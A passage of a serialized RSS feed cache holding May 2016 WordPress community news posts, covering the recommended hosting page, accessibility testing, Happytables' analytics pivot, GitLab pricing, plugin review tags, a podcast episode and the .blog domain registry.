unlisted) businesses a great deal. This is why I take full responsibility for the listing, now and in the future — I have been fortunate to be extraordinarily successful and no financial or business consideration any of the applicants could offer matters to me. A host could offer $100,000,000 to be listed on the page for 1 day, and I would say no.</p></blockquote>\n<p>It’s unfortunate that the information in Mullenweg’s comment is not published in an official post announcing the changes to the recommended hosting page. If an official post was published that included the same information in his comment, it’s possible it would have eliminated most of the confusion, uncertainty, and doubt surrounding it.</p>\n<h2>Should WordPress.org Have a Recommended Hosting Page?</h2>\n<p>Due to the investments EIG has made in Automattic, Mullenweg’s role at the company, and him making the final decisions, there will always be a potential conflict of interest despite taking full responsibility of the page and the processes associated with it.</p>\n<p>Should WordPress.org have a recommended hosting page? What if the page was replaced with information people could use to make informed decisions on choosing a host? It would eliminate potential conflicts of interest and if there was a host Mullenweg felt strongly about, he could label it as a partner of the project. This would make it clear that any financial connection with the company is a business relationship.</p>\n<p>Are you hosting with any of the companies listed on the recommended hosting page? If so, tell us about your experience in the comments.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 14 May 2016 16:39:29 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:33;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"WPTavern: WordPress Accessibility Team Seeks Testers Using Speech Recognition Technology\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54829\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"http://wptavern.com/wordpress-accessibility-team-seeks-testers-using-speech-recognition-technology\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2791:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/glasses.jpg\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/glasses.jpg?resize=1024%2C562\" alt=\"photo credit: Let\'s Read - (license)\" class=\"size-full wp-image-54851\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/42788859@N00/320216939\">Let’s Read</a> – <a href=\"https://creativecommons.org/licenses/by-nc-sa/2.0/\">(license)</a>\n<p>The World Health Organization estimates that <a href=\"http://www.who.int/mediacentre/factsheets/fs282/en/\" target=\"_blank\">285 million people</a> worldwide are living with some form of visual impairment and 39 million of those are estimated to be blind. Many people with low vision depend on speech recognition technology to navigate the web and communicate their thoughts. This type of software also assists people who have carpal tunnel, RSI (Repetitive Stress Injuries) and/or limited mobility in their hands and arms.</p>\n<p>Rian Rietveld and the Accessibility team are working to improve the experience of using WordPress with speech recognition software, such as <a href=\"http://www.nuance.com/dragon/index.htm\" target=\"_blank\">Dragon Naturally Speaking</a> (widely considered as one of the best for desktop use.) In particular, <a href=\"https://core.trac.wordpress.org/ticket/23562\" target=\"_blank\">the task of adding media to a post has a number of obstacles</a> that make it nearly impossible for those using speech recognition software.</p>\n<p>Rietveld <a href=\"https://make.wordpress.org/accessibility/2016/05/13/20th-wordpress-accessibility-test-add-media-with-speech-recognition-software/\" target=\"_blank\">posted three tests</a> to the Accessibility team’s blog today, inviting those who use <a href=\"http://www.nuance.com/dragon/index.htm\" target=\"_blank\">Dragon Naturally Speaking</a> or other assistive technology to help the contributors determine the roadblocks that need to be removed for adding media. These tests include actions like adding media, editing attachment details, and creating a gallery.</p>\n<p>If you use WordPress with assistive technology for speech recognition, completing these tests and offering your feedback is one way to get involved as a contributor. You don’t necessarily have to use Dragon Naturally Speaking, as there are many newer alternatives such as Windows Speech Recognition (Cortana) and Chrome’s speech recognition powered by Google Speech to Text. Testers can report their experiences, along with the assistive technology/browser/OS, in the comments on Rietveld’s <a href=\"https://make.wordpress.org/accessibility/2016/05/13/20th-wordpress-accessibility-test-add-media-with-speech-recognition-software/\" target=\"_blank\">post</a>.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 13 May 2016 22:40:35 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:34;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WPTavern: Happytables Pivots to Provide Restaurant Analytics and Insights\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=41046\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"http://wptavern.com/happytables-pivots-to-provide-restaurant-analytics-and-insights\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5302:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/happy-tables.jpg\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/happy-tables.jpg?resize=1000%2C608\" alt=\"happy-tables\" class=\"aligncenter size-full wp-image-54835\" /></a></p>\n<p><a href=\"http://www.happytables.com/\" target=\"_blank\">Happytables</a> is changing from being a platform that hosts restaurant websites to one that provides analytics and insights by tapping into apps that restaurants are already using to promote their businesses. The company uses WordPress as a command center for the application that communicates with various restaurant-tech APIs to deliver information to the dashboard in realtime.</p>\n<p>“We started with the website builder a while back,” Founder and CEO Noel Tock said. “It’s been a great ride, but we realized two things: 1) Website builders have become a race to the bottom with regards to revenue as well as extremely competitive, and 2) From our many conversations with restaurants, their challenges have become much larger; consolidating data and insights from all the products they now use.”</p>\n<p>One of the Happytables beta restaurants in London uses 14 different applications to manage its sales, operations, and marketing, and Tock says this trend is only growing.</p>\n<p>“The centre of gravity is shifting from the Point of Sale to a very fragmented collection of siloed products (reservations, online ordering, staff scheduling/wages, loyalty, waitlist, social, etc.),” Tock said. “Becoming that 30,000 foot view whilst generating actionable insights across the portfolio of applications is the challenge we’ve taken on with the new Happytables.”</p>\n<p>The first installation of the new Happytables was set up for <a href=\"http://whyteandbrown.com/\" target=\"_blank\">Whyte & Brown</a> in London where the team is focusing their beta testing. The application currently aggregates data from POS (Point of Sale) and Social, but Tock says this will rapidly evolve to providing various insights from POS and Labor, such as revenue forecasting, employee performance, and breakfast/lunch/dinner performance.</p>\n<p>“It’s been very exciting working towards actionable insights, whereby we can tell a waiter that he/she was underselling a certain product or category compared to their colleagues, or that a particular employee performs a lot better on lunch then on dinner,” Tock said.</p>\n<p>Below you can see an example of Happytables’ latest kitchen dashboard, using the team view as opposed to the individual employee recommendations/suggestions view.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/Happytables_kitchen_dashboard.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/Happytables_kitchen_dashboard.png?resize=1025%2C731\" alt=\"Happytables_kitchen_dashboard\" class=\"aligncenter size-full wp-image-54833\" /></a></p>\n<p>The new Happytables uses WordPress as a backend and the WP REST API and ReactJS on the frontend. Although the development team still uses WordPress as one of its core technologies, the infrastructure is a bit more complicated.</p>\n<p>“It’s not pure WordPress for the data storage,” CTO Aaron Jorbin said. “In fact, very little of it is actually stored inside WordPress. It is used to store some information about the restaurant and manage requests to third parties where we fetch the data and then store it in DynamoDB.”</p>\n<p>The screenshots in this post show the WordPress theme in full screen mode, but Jorbin said the restaurant staff never interact with wp-admin. Restaurant operators use the app to view all the realtime information coming in so that they can make better decisions about how they run their businesses.</p>\n<p>Happytables is still hosting its customers from its first iteration as a website builder, but Tock said most are not good candidates for the beta.</p>\n<p>“The infrastructure is quite different now as we’re capturing different types of data (previously web content, now largely transactional data),” he said. “Our customers on the website builder platform came from all walks of life, so there’s not many who fit the ideal beta candidate (using Micros/Aloha as POS, based in London, run a multiunit restaurant, etc.).</p>\n<p>“We’re just looking to see how we can fit this into the larger Happytables model downstream,” Tock said. “If we’re going to implement so many API’s, there’s also value in tying those back to the website.”</p>\n<p>Not many aspects of the new infrastructure have been open sourced yet, as the team has been moving fast. Tock said they hope to make some of their code public further down the road after it’s been tested.</p>\n<p>“Once we’re past testing/beta, I’m sure a number of features will become more mature tools and move into their own public repo if they are of that sort of benefit,” he said. The new infrastructure is one of the many exciting ways that the WP REST API is being used to bring a host of information into WordPress from various third party applications and tie it all together in a useful way.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 13 May 2016 19:45:25 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:35;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Matt: Mom on Tinder\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"https://ma.tt/?p=46572\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"https://ma.tt/2016/05/mom-on-tinder/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:227:\"<p>If you’re looking for a fun Friday read, <a href=\"http://www.gq.com/story/my-mom-ran-my-tinder\">check out this story of a young GQ writer who gave control of his Tinder account to his Mom</a>. It’s adorkable.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 13 May 2016 16:35:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:36;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"WPTavern: GitLab Courts Disgruntled GitHub Customers with Response to Recent Pricing Hike\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54780\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:99:\"http://wptavern.com/gitlab-courts-disgruntled-github-customers-with-response-to-recent-pricing-hike\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5016:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/01/gitlab.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/01/gitlab.png?resize=1025%2C371\" alt=\"gitlab\" class=\"aligncenter size-full wp-image-50741\" /></a></p>\n<p>Yesterday GitHub <a href=\"http://wptavern.com/github-introduces-unlimited-private-repositories-hikes-prices-for-organizations\" target=\"_blank\">announced</a> pricing changes that give all paid plans unlimited repositories and change plans to a pricing-per-user model. Individual developers are the most likely customers to benefit from the changes, but many organizations will see an exponential increase in pricing.</p>\n<p>GitLab, a competitor in the Git repository hosting space, immediately addressed disgruntled GitHub customers with a <a href=\"https://about.gitlab.com/2016/05/11/git-repository-pricing/\" target=\"_blank\">pricing comparison</a> on the company’s blog. Co-founder and CEO <a href=\"https://twitter.com/sytses\" target=\"_blank\">Sid Sijbrandij</a> noted that the three main players in this space, GitHub, Bitbucket, and GitLab, all offer unlimited private repositories but that it doesn’t cost companies more to host additional repositories for a given user.</p>\n<p>Sijbrandij attributes the change to the increase in the <a href=\"https://www.sequoiacap.com/article/build-us-microservices/\" target=\"_blank\">microservices model</a>, a development approach that breaks software down into smaller, related pieces that communicate with one another via APIs.</p>\n<p>“As more and more developers, teams, and organizations seek out the advantages of microservices, they’ll need more repositories to support this new code structure,” Sijbrandij said. “Basically, the more microservices you have the more repositories you’ll need. That is why it is not surprising that GitHub has announced free private repositories.”</p>\n<p>Sijbrandij referenced several examples where GitHub’s pricing changes hit open source organizations hard, including <a href=\"https://github.com/edx/\" target=\"_blank\">Open edX</a>, a non-profit with a large number of contributors, which <a href=\"https://news.ycombinator.com/item?id=11674530\" target=\"_blank\">posted</a> the following on Hacker News:</p>\n<blockquote><p>I work for a non-profit open source organization that <a href=\"https://github.com/edx/\" target=\"_blank\">collaborates on github</a>. We have lots of people who aren’t employees, but have signed a contributor agreement with our organization and contribute changes to our software. Our bill will go up from $200/month to over $2000/month with this new pricing. We can afford it (it’s still a small fraction of our AWS bill) but it will force us to look at other alternatives. Github’s code review tools are already pretty mediocre compared to other tools like gerrit, and we’ve long since moved off of GitHub issue tracking due to lack of features compared to JIRA.</p></blockquote>\n<p>Sijbrandij emphasized that the team at GitLab believes “everyone can contribute,” a mission which drives GitLab.com’s pricing structure to offer unlimited private repositories, unlimited contributors, and unlimited CI runners for free. The on-premises solution, which includes enterprise features and support, is what keeps the lights on at the company. GitLab.com, the free, hosted version, runs the same enterprise edition software but is, by Sijbrandij’s own admission, still <a href=\"https://gitlab.com/gitlab-com/operations/issues/42\" target=\"_blank\">struggling with sluggish performance</a>.</p>\n<p>Earlier this year when open source project maintainers <a href=\"http://wptavern.com/open-source-project-maintainers-confront-github-with-open-letter-on-issue-management\" target=\"_blank\">confronted GitHub with an open letter on issue management</a>, GitLab differentiated itself by <a href=\"http://wptavern.com/gitlab-courts-open-source-project-maintainers-with-response-to-dear-github-letter\" target=\"_blank\">responding</a> to the situation with a new initiative focused on “making GitLab the best place for big open source projects.”</p>\n<p>Nearly a month later, <a href=\"http://wptavern.com/github-responds-to-letter-from-open-source-project-maintainers\" target=\"_blank\">GitHub finally responded</a> with an apology to open source project maintainers and a promise to address their concerns with a steady string of changes.</p>\n<p>GitHub has not given any indication of reversing its recent decision to change its pricing structure. However, with competitors like GitLab putting on the heat, GitHub may be forced to make some changes to its paid plans. At the very least, it could inspire the company to address concerns about organizations having to pay for inactive users and perhaps spur GitHub to offer customers the ability to distinguish between collaborators on open source projects and users who simply need access to private repositories.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 13 May 2016 02:33:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:37;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:106:\"WPTavern: How Authors With Plugins in the Official Directory Can Use Tags to Get a Moderator’s Attention\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54441\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:113:\"http://wptavern.com/how-authors-with-plugins-in-the-official-directory-can-use-tags-to-get-a-moderators-attention\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2627:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/05/WordPressAdviceForNewUsers.png\"><img class=\"size-full wp-image-44085\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/05/WordPressAdviceForNewUsers.png?resize=612%2C237\" alt=\"WordPress Advice For New Users\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/99329675@N02/11064947983\">What You Need To Know About Food Poisoning</a> – <a href=\"https://creativecommons.org/licenses/by-sa/2.0/\">(license)</a>\n<p>It’s almost inevitable that as a WordPress plugin gains popularity, it will receive a bad review. How plugin authors handle and respond to bad reviews is crucial, especially in a public forum. Mika Epstein, who helps review plugins before they’re added to the directory and is a dedicated support forum volunteer, <a href=\"https://make.wordpress.org/plugins/2016/05/03/handling-bad-reviews/\">gives advice </a>on how to handle and respond to bad reviews.</p>\n<p>Bad reviews are classified as those written as spam, trolling, emotional blackmail for support, and those that should have been a support post. Since the plugin review system is powered by bbPress, plugin authors can add tags to reviews in order to draw a moderator’s attention. The tags include:</p>\n<ul>\n<li><strong>Modlook</strong> – This tag notifies moderators that a particular thread needs their attention. If you think a review is spam, don’t respond to it. Instead, add the Modlook and Spam tags and let a moderator decide if the review should be deleted.</li>\n<li><strong>Sockpuppet</strong> – If you suspect a review is part of a spamming campaign where a group of people are marking a plugin as one or five stars, apply the sockpuppet and modlook tags to the review.</li>\n<li><strong>Wrongplugin</strong> – Add the wrongplugin tag to the review if you believe it’s for a different plugin. The team can move the review to the appropriate place.</li>\n<li><strong>Pluginmod</strong> – Add this tag to a review if you need an administrator’s attention. This usually results in the team performing a full review of your plugin. If it’s determined that it breaks any of <a href=\"https://wordpress.org/plugins/about/guidelines/\">the guidelines</a>, it will be removed until they’re fixed.</li>\n</ul>\n<p>Developers who host plugins in the official directory should make note of these tags and use them when necessary. The tag system is generally unknown to the public but it’s a great way for moderators to keep on top of the forums and reviews.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 13 May 2016 01:06:02 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:38;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WPTavern: WPWeekly Episode 234 – All Things WordCamp with Andrea Middleton\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://wptavern.com?p=54807&preview_id=54807\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"http://wptavern.com/wpweekly-episode-234-all-things-wordcamp-with-andrea-middleton\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2896:\"<p>In this episode of WordPress Weekly, Marcus Couch and I are joined by <a href=\"https://thethingwiththestuff.wordpress.com/\">Andrea Middleton</a>, who works at Automattic as a Community Organizer for the WordPress open source project. We discuss a number of topics including, updates to the WordCamp Central website, the <a href=\"https://make.wordpress.org/community/2016/03/02/transitioning-to-wordpress-community-support/\">for-profit subsidiary</a>, and the experimental <a href=\"http://wptavern.com/wordpress-to-launch-experimental-wordcamp-incubator-program\">WordCamp incubator program</a>.</p>\n<p>At the conclusion of our interview with Middleton, Mendel Kurland, GoDaddy’s Evangelist, joined us to describe his experiences attending DrupalCons. DrupalCons are events similar to WordCamps but on a larger scale. He tells us what the similarities and differences are and the unique things they do that he’d like to see WordCamps adopt. We close out the show with Marcus’ plugin picks of the week.</p>\n<h2>Stories Discussed:</h2>\n<p><a href=\"http://wptavern.com/wordpress-4-5-2-patches-two-security-vulnerabilities\">WordPress 4.5.2 Patches Two Security Vulnerabilities</a><br />\n<a href=\"http://wptavern.com/automattic-is-protecting-its-woo-woothemes-and-woocommerce-trademarks\">Automattic is Protecting its Woo, WooThemes, and WooCommerce Trademarks</a></p>\n<h2>Plugins Picked By Marcus:</h2>\n<p><a href=\"https://wordpress.org/plugins/disable-core-update-email/\">Disable WordPress Core Update Email</a> allows used to disable the default notification email sent by WordPress after an automatic core update is applied.</p>\n<p><a href=\"https://wordpress.org/plugins/downgrade/\">Downgrade </a>enables users to easily downgrade WordPress to an earlier version. It’s a handy diagnostics tool that helps determine if a new WordPress release is the cause of errors.</p>\n<p><a href=\"https://wordpress.org/plugins/woo-customer-insight\">Woo Customer Insight </a>provides greater insight into what visitors are doing on your sites. It allows you to see the pages your customers are visiting, where they’re clicking, the time spent on the different pages, and more.</p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, May 18th 9:30 P.M. Eastern</p>\n<p><strong>Subscribe To WPWeekly Via Itunes: </strong><a href=\"https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via RSS: </strong><a href=\"http://www.wptavern.com/feed/podcast\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via Stitcher Radio: </strong><a href=\"http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Listen To Episode #234:</strong><br />\n</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 12 May 2016 23:23:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:39;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Matt: .Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"https://ma.tt/?p=46554\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://ma.tt/2016/05/blog/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:858:\"<p>It’s now public that Automattic is the company behind Knock Knock Whois There LLC, the registry for the new .blog TLD. (And a great pun.) We wanted to stay stealth while in the bidding process and afterward in order not to draw too much attention, but nonetheless the cost of the .blog auction got up there (people are <a href=\"http://www.theregister.co.uk/2015/02/13/who_just_bought_dotblog_for_30m/\">estimating around $20M</a>). I’m excited we won and think that it will be both an amazing business going forward and give lots of folks an opportunity to have a fantastic domain name in a new namespace and with an easy-to-say TLD. <a href=\"https://dotblog.wordpress.com/\">You can sign up to be first in line to reserve a domain here</a>. If you have a trademark you can get in August, and then October for the “land 